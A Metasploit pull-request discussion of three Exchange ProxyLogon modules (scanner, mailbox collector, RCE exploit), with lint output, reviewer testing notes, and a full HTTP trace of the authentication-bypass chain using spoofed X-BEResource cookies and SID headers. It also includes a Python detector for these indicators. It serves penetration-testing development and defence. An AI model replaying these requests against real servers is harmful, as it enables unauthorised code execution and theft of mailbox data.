add. Auxiliary/Exploit Scanner/Gather/RCE for Exchange ProxyLogon (CVE-2021-26855) #14860
Conversation
Please resolve msftidy and rubocop errors:
--- Checking new and changed module syntax with tools/dev/msftidy.rb ---
modules/auxiliary/scanner/http/exchange_proxylogon.rb - [INFO] No CVE references found. Please check before you land!
modules/auxiliary/scanner/http/exchange_proxylogon.rb - [ERROR] Module should not be executable (+x)
== modules/auxiliary/scanner/http/exchange_proxylogon.rb ==
C: 12: 22: [Correctable] Layout/ModuleHashOnNewLine: update_info should start on its own line
C: 12: 23: [Correctable] Layout/ModuleHashOnNewLine: info should start on its own line
C: 25: 7: [Correctable] Layout/ModuleDescriptionIndentation: Module descriptions should be properly aligned to the 'Description' key, and within %q{ ... }
C: 43: 24: [Correctable] Layout/ModuleHashOnNewLine: A new line is missing
C: 46: 24: [Correctable] Layout/FirstArrayElementIndentation: Use 2 spaces for indentation in an array, relative to the start of the line where the left square bracket is.
C: 47: 22: [Correctable] Layout/FirstArrayElementIndentation: Indent the right bracket the same as the start of the line where the left bracket is.
1 file inspected, 6 offenses detected, 6 offenses auto-correctable
modules/auxiliary/scanner/http/exchange_proxylogon.rb - [ERROR] Rubocop failed. Please run rubocop -a modules/auxiliary/scanner/http/exchange_proxylogon.rb and verify all issues are resolved
Please also run
Thanks for this great contribution @mekhalleh! I just left a few minor comments, when you got a chance.
documentation/modules/auxiliary/gather/exchange_proxylogon_collector.md
documentation/modules/auxiliary/scanner/http/exchange_proxylogon.md
I was not able to make the module grab emails and contacts from Exchange 2016 CU12 Version 15.1 (Build 1713.5). I'm getting an Here is the response I got:
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
<s:Header>
<h:ServerVersionInfo xmlns:h="http://schemas.microsoft.com/exchange/services/2006/types" xmlns="http://schemas.microsoft.com/exchange/services/2006/types" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" MajorVersion="15" MinorVersion="1" MajorBuildNumber="1713" MinorBuildNumber="5"/>
</s:Header>
<s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<m:GetFolderResponse xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types">
<m:ResponseMessages>
<m:GetFolderResponseMessage ResponseClass="Error">
<m:MessageText>Access is denied. Check credentials and try again., </m:MessageText>
<m:ResponseCode>ErrorAccessDenied</m:ResponseCode>
<m:DescriptiveLinkKey>0</m:DescriptiveLinkKey>
<m:Folders/>
</m:GetFolderResponseMessage>
</m:ResponseMessages>
</m:GetFolderResponse>
</s:Body>
</s:Envelope>
documentation/modules/auxiliary/scanner/http/exchange_proxylogon.md
documentation/modules/auxiliary/gather/exchange_proxylogon_collector.md
You need to have two vulnerable Exchange servers to check the exploitation. My lab is:
Work with the collector module:
** Note: You can also invert
You got this message (
The module is based on this second option.
Thank you so much!
You can already do that with msf resource scripts, using a known path list from a file to brute-force the path. But maybe it is possible to find a local path disclosure. I don't know.
Just add a new option
Thanks for updating the code @mekhalleh. I just did a last round of review and added some comments.
In particular, the issue with oab_id throwing a NoMethodError was breaking the exploit for me. Please let me know if you have any questions.
documentation/modules/exploit/windows/http/exchange_proxylogon_rce.md
documentation/modules/exploit/windows/http/exchange_proxylogon_rce.md
@cdelafuente-r7 nice.. it's done ;)
@cdelafuente-r7, in the last update, I added and fixed a lot of stuff ...
RCE module: Started with the missing options for web delivery. But now there is no longer any need for this, I have added Powershell. Regarding the IIS path, I added the option I'm just redoing a commit to remove a reference to Know issue
Collector module: I've added a check that detects whether the targeted internal server is alive.
Hello @cdelafuente-r7, I'm ready to land ;) if you don't have any other comments.
@mekhalleh I pulled your latest, both my issues remain. Proxy is still required to do the check and the exploit fails on the OAB-id request. I'm using a fresh lab build of Exchange 2016 x64 on Server 2012R2 where AD is on another server. The exchange write path and base path are correct with their defaults values. |
@mkunz-sec I use 2 different env of metasploit framework. First env, based on BlackArch package and second is my develop env (on Ubuntu Linux). On the 2 env I've not trouble about proxy. Maybe you have issue with your framework. I think @cdelafuente-r7 would have warned me about that. But if you want to send me the traces that I am looking at or it fails ;) With proxy and without proxy. Use |
@mkunz-sec and if you want test this : https://github.com/mekhalleh/exchange_proxylogon/blob/develop/exchange_proxylogon_rce.rb |
If you are using the latest version of the module, you no longer need web delivrery. Now this use Powershell oneliner stager. Also look at known issues, especially number 2 (#14860 (comment)) Depending on the payload used, two cmd.exe processes remain alive on the server. If this is the case, you cannot make another attempt if they are not killed ... But for your proxy problem? I do not know. |
@cdelafuente-r7 There is a test that I cannot perform on my lab, because I cannot test method 2 to take the canary. But if you feel like doing it, the context is as follows: Create a user mailbox and connect to it. Run the module on the targeted user mailbox. If you have the following message: replace all occurrences of:
by
and re-run the module. And let me know if it works. Thanks in advance ;)
I got the same message with a user email time zone both set and not set. Changing the code to use the static SID prefix gave the same you need to log in as administrator@tech.com (I'm targeting user@tech.com) and set a time zone. Setting a timezone for both administrator and my user account gave this error with the code change.
Thanks for the updates and for the latest addition @mekhalleh! I tested the new Powershell target and it works great!
I just left a few comments for the last round of review.
As requested, I tested the second method to get the canary with a non-admin email. I got a slightly different error (access denied). Changing the SID to S-1-5-20 gives me the same error:
[*] Try to get a good msExchCanary (without correcting the user SID)
####################
# Request:
####################
POST /ecp/ws.js HTTP/1.1
Host: <redacted>
User-Agent: Mozilla/5.0
Cookie: X-BEResource=Admin@SRV02:444/ecp/proxyLogon.ecp?a=~2145660510;
msExchLogonMailbox: S-1-5-20
msExchTargetMailbox: S-1-5-20
Content-Type: text/xml; charset=utf-8
Content-Length: 91
<r at="Negotiate" ln="TestUserN1"><s>S-1-5-21-<redacted>-<redacted>-<redacted>-1114</s></r>
####################
# Response:
####################
HTTP/1.1 241
Cache-Control: private
Server: Microsoft-IIS/10.0
request-id: 6d866e85-c28c-4b7f-8bbb-7069f704c9fd
X-CalculatedBETarget: srv02
X-Content-Type-Options: nosniff
X-DiagInfo: SRV02
X-BEServer: SRV02
X-UA-Compatible: IE=10
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=ad7b3f3a-f3c1-4b92-8637-b8a4e4567632; path=/; secure; HttpOnly, msExchEcpCanary=z6mSmJxdgk-xkat7oAM2ycA_Vzvd7tgIZjcK8Q0_s42gb1vYcoLxcPV-qsD3o_jwAk4vwWA5pXA.; path=/ecp
X-Powered-By: ASP.NET
X-FEServer: SRV02
Date: Mon, 22 Mar 2021 15:55:21 GMT
Content-Length: 0
####################
# Request:
####################
POST /ecp/ws.js HTTP/1.1
Host: <redacted>
User-Agent: Mozilla/5.0
Cookie: X-BEResource=Admin@SRV02:444/ecp/DDI/DDIService.svc/GetList?reqId=1615583487987&schema=VirtualDirectory&msExchEcpCanary=z6mSmJxdgk-xkat7oAM2ycA_Vzvd7tgIZjcK8Q0_s42gb1vYcoLxcPV-qsD3o_jwAk4vwWA5pXA.&a=~2068268331; ASP.NET_SessionId=ad7b3f3a-f3c1-4b92-8637-b8a4e4567632; msExchEcpCanary=z6mSmJxdgk-xkat7oAM2ycA_Vzvd7tgIZjcK8Q0_s42gb1vYcoLxcPV-qsD3o_jwAk4vwWA5pXA.;
msExchLogonMailbox: S-1-5-20
msExchTargetMailbox: S-1-5-20
Content-Type: application/json; charset=utf-8
Content-Length: 159
{"filter":{"Parameters":{"__type":"JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel","SelectedView":"","SelectedVDirType":"OAB"}},"sort":{}}
####################
# Response:
####################
HTTP/1.1 500 Internal Server Error
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/10.0
request-id: 44fd24a5-4ebc-4314-bcbb-3d9dc1593efc
X-CalculatedBETarget: srv02
X-Content-Type-Options: nosniff
X-ECP-ERROR: Microsoft.Exchange.Configuration.Authorization.CmdletAccessDeniedException
jsonerror: true
X-DiagInfo: SRV02
X-BEServer: SRV02
X-UA-Compatible: IE=10
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-FEServer: SRV02
Date: Mon, 22 Mar 2021 15:55:21 GMT
Content-Length: 2125
{"Message":"Your request couldn't be completed. Please try again, and if the problem persists, contact your administrator.","ExceptionDetail":{"HelpLink":null,"InnerException":null,"Message":"You don't have permission to open this page. If you're a new user or were recently assigned credentials, please wait 15 minutes and try again.","StackTrace":" at Microsoft.Exchange.Management.DDIService.CmdletActivity.IsRunnable(DataRow input, DataTable dataTable, DataObjectStore store)\u000d\u000a at Microsoft.Exchange.Management.DDIService.BranchActivity.Run(DataRow input, DataTable dataTable, DataObjectStore store, Type codeBehind, UpdateTableDelegate updateTableDelegate)\u000d\u000a at Microsoft.Exchange.Management.DDIService.Workflow.Run(DataRow input, DataTable dataTable, DataObjectStore store, Type codeBehind, UpdateTableDelegate updateTableDelegate)\u000d\u000a at Microsoft.Exchange.Management.DDIService.WSListDataHandler.ExecuteCore(Workflow workflow)\u000d\u000a at Microsoft.Exchange.Management.DDIService.WSDataHandler.Execute()\u000d\u000a at Microsoft.Exchange.Management.DDIService.DDIServiceHelper.GetListCommon(DDIParameters filter, SortOptions sort, Boolean forGetProgress)\u000d\u000a at Microsoft.Exchange.Management.DDIService.DDIService.GetList(DDIParameters filter, SortOptions sort)\u000d\u000a at SyncInvokeGetList(Object , Object[] , Object[] )\u000d\u000a at System.ServiceModel.Dispatcher.SyncMethodInvoker.Invoke(Object instance, Object[] inputs, Object[]& outputs)\u000d\u000a at System.ServiceModel.Dispatcher.DispatchOperationRuntime.InvokeBegin(MessageRpc& rpc)\u000d\u000a at System.ServiceModel.Dispatcher.ImmutableDispatchRuntime.ProcessMessage5(MessageRpc& rpc)\u000d\u000a at System.ServiceModel.Dispatcher.ImmutableDispatchRuntime.ProcessMessage11(MessageRpc& rpc)\u000d\u000a at System.ServiceModel.Dispatcher.MessageRpc.Process(Boolean 
isOperationContextSet)","Type":"Microsoft.Exchange.Configuration.Authorization.CmdletAccessDeniedException"},"ExceptionType":"Microsoft.Exchange.Configuration.Authorization.CmdletAccessDeniedException","StackTrace":null}
[-] Exploit aborted due to failure: not-found: No 'OAB Id' was found
[*] Exploit completed, but no session was created.
Also, would you mind adding your comment about the RCE module (known issues, etc.) to the module documentation? I think it is very valuable information and it will probably be lost in this PR thread.
If you don't have anything else to add to this PR, I think we're good to land once the last round of comments is addressed.
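As a defender-side companion to the request trace above, here is an added Python example (not code from this PR or from the Metasploit project) that parses raw HTTP requests and flags the CVE-2021-26855 indicators visible in that trace: a client-supplied X-BEResource cookie that routes to a backend on port 444, and the internal msExchLogonMailbox/msExchTargetMailbox headers that only the front end should add. The sample requests, host names, SIDs and request ids are constructed placeholders.

```python
import re

# Constructed sample requests modelled on the trace in this thread; host names,
# SIDs and request ids are placeholders, not values from any real server.
SUSPICIOUS_REQUEST = (
    "POST /ecp/ws.js HTTP/1.1\r\nHost: mail.example.test\r\nUser-Agent: Mozilla/5.0\r\n"
    "Cookie: X-BEResource=Admin@SRV02:444/ecp/proxyLogon.ecp?a=~2145660510;\r\n"
    "msExchLogonMailbox: S-1-5-20\r\nmsExchTargetMailbox: S-1-5-20\r\n"
    "Content-Type: text/xml; charset=utf-8\r\n\r\n"
    '<r at="Negotiate" ln="TestUser"><s>S-1-5-21-0-0-0-1114</s></r>'
)
BENIGN_REQUEST = (
    "GET /ecp/default.aspx HTTP/1.1\r\nHost: mail.example.test\r\n"
    "Cookie: ASP.NET_SessionId=0000; msExchEcpCanary=AAAA.\r\n\r\n"
)

BERESOURCE_RE = re.compile(r"X-BEResource=([^;]+)", re.IGNORECASE)
# Headers the backend expects from the front end, never from an external client.
INTERNAL_HEADERS = ("msexchlogonmailbox", "msexchtargetmailbox")


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, lower-cased header dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def proxylogon_indicators(raw):
    """Return the reasons a request looks like CVE-2021-26855 abuse (empty list = clean)."""
    _method, _path, headers, _body = parse_request(raw)
    reasons = []
    match = BERESOURCE_RE.search(headers.get("cookie", ""))
    if match:
        target = match.group(1)
        # The front end sets X-BEResource itself; a client never sends it, and a value
        # naming a backend host on port 444 is the routing trick ProxyLogon relies on.
        reasons.append(f"client-supplied X-BEResource cookie: {target}")
        if re.search(r"@[^/:]+:444/", target):
            reasons.append("X-BEResource routes the request to a backend on port 444")
        if "/ecp/proxylogon.ecp" in target.lower():
            reasons.append("X-BEResource targets /ecp/proxyLogon.ecp")
    for name in INTERNAL_HEADERS:
        if name in headers:
            reasons.append(f"client-supplied internal header {name}: {headers[name]}")
    return reasons
```

Feed it requests reconstructed from a proxy capture or IIS request logging; any non-empty result for traffic arriving from outside the Exchange front end is worth investigating.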
I tested again, it works.
All is done ;) It was very interesting and a bit complicated too ... doing blind things like patching the SID was not easy. @cdelafuente-r7, many thanks for your help ;)
Thank you for this great contribution @mekhalleh and for being so responsive. It was a pleasure to work with you on these exploits. I re-tested the 3 modules and everything looks fine. I just need to fix some minor issues that Rubocop reports on the up-to-date One last piece of feedback for the next contributions (I hope there will be more soon!). It is recommended to submit only one module per pull request. It is usually faster to land since we don't have to wait for every module to be ready. In this case, both auxiliary modules could have been landed before the RCE.
Example output (Exchange 2016 CU12 on Windows Server 2016)
Scanner module (exchange_proxylogon)
Auxiliary module (exchange_proxylogon_collector)
RCE exploit module (exchange_proxylogon_rce)
Original Release Notes
This adds 3 modules that leverage two Microsoft Exchange Server vulnerabilities patched in the March out-of-band security updates:
Release Notes
New module
New module
New module
Introduction
An issue was discovered in Microsoft Exchange Server that allows an attacker to bypass authentication and impersonate the admin (CVE-2021-26855). Chaining this bug with a post-auth arbitrary-file-write vulnerability (CVE-2021-27065) yields code execution.
As a result, an unauthenticated attacker can execute arbitrary commands on Microsoft Exchange Server.
This vulnerability affects Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013 and Exchange 2019 CU8 < 15.02.0792.010.
All components are vulnerable by default.
Verification Steps
use auxiliary/scanner/http/exchange_proxylogon
set RHOSTS [IP]
run
Options
METHOD: HTTP Method to use (for CVE-2021-26855). Default: POST
Proxies: This option is not set by default.
RPORT: The default setting is 443. To use: set RPORT [PORT]
SSL: The default setting is true.
THREADS: The default setting is 1.
VHOST: This option is not set by default.
Scenarios
References